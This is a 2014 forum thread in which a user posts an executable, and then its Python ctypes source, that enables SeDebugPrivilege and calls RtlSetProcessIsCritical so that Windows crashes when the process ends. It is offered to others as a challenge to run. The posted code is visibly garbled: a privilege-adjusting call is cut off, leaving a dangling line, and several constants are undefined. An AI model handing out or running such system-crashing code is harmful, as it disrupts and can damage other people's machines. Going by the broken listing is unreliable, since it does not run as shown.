Thread subject: Security Override :: Dont Do It

Posted by madf0x on 07/04/2014 19:34:24

Dont run this as administrator.


if someone points out how I did it, Ill throw up the code.

Edited by madf0x on 07/04/2014 21:09:05

Posted by cruizrisner on 07/05/2014 04:20:32

an exe? oh hell no, even though u are a highly trusted member, hell no

Posted by madf0x on 07/05/2014 11:33:41


Posted by madf0x on 07/05/2014 12:35:01

In a way this is my own reverse engineering challenge. If you dont overthink it, itll be easy.

Posted by cruizrisner on 07/05/2014 14:47:24

ill only use this in WINE on a linux OS :P

i trust u, but its an exe lol, its nature to be sketchy of those from ppl i know could create FUD malicious software that could go untraceable ;)

Posted by madf0x on 07/05/2014 15:04:13

I dont think itd work on WINE. Or at least id be curious to see how wine reacts to it, let me know :)

When making it, I just tested it out on a cheapo $100 laptop I had gotten from a pawnstore a few years back, just in case something did permanently break.

It doesnt do anything new really, I just dont hear about it often and I wanted to wrap it up in python with ctypes.

Posted by madf0x on 07/07/2014 00:16:47

Ok got bored. Heres the horrible code(had to ad-hoc fix up some ad-hoc code that I attached in an ad-hoc manner to my own ad-hoc code, deal with it)

edit: the commented out code was part of the code I borrowed. Python complained and so I figured it was referencing something that the original author assumed would be imported, but I never bothered to find out what
and it didnt seem to affect the code being ran, but I included it in case I needed to reference this code later
and wound up needing to dig deeper into said code.


import sys
from ctypes import *

ntdll = cdll.ntdll
kernel32 = cdll.kernel32


class LUID( Structure):
   _fields_ = [
         ('LowPart', c_ulong),
         ('HighPart', c_long) ]
class TOKEN_PRIVLEGES( Structure):
   _fields_ = [
         ('PrivilegeCount', c_uint),
         ('Luid', LUID),
         ('Attributes', c_uint) ]
OpenProcessToken = windll.advapi32.OpenProcessToken
OpenProcessToken.argtypes = [
   c_int,   #HANDLE ProcessHandle
   c_uint, #DWORD DesiredAccess
   c_void_p ] #PHANDLE TOken Handle

#OpenProcessToken.restype = ErrorIfZero

AdjustTokenPriv = windll.advapi32.AdjustTokenPrivileges
AdjustTokenPriv.argtypes = [
   c_int, c_int, c_void_p, c_uint, c_void_p, c_void_p ]
#AdjustTokenPriv.restype = ErrorIfZero

LookupPrivValue = windll.advapi32.LookupPrivilegeValueA
LookupPrivValue.argtypes = [
   c_char_p, c_char_p, c_void_p]
#LookupPrivValue.restype = ErrorIfZero

access_token = c_int(0)
privileges = TOKEN_PRIVLEGES()

OpenProcessToken(windll.kernel32.GetCurrentProcess(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, byref(access_token) )
access_token = access_token.value
LookupPrivValue(None, "SeDebugPrivilege", byref(privileges.Luid) )
privileges.PrivilegeCount = 1
privileges.Attributes = 2
            None )
windll.kernel32.CloseHandle( access_token )

ntdll.RtlSetProcessIsCritical(True, None, False)


Edited by madf0x on 07/07/2014 00:58:29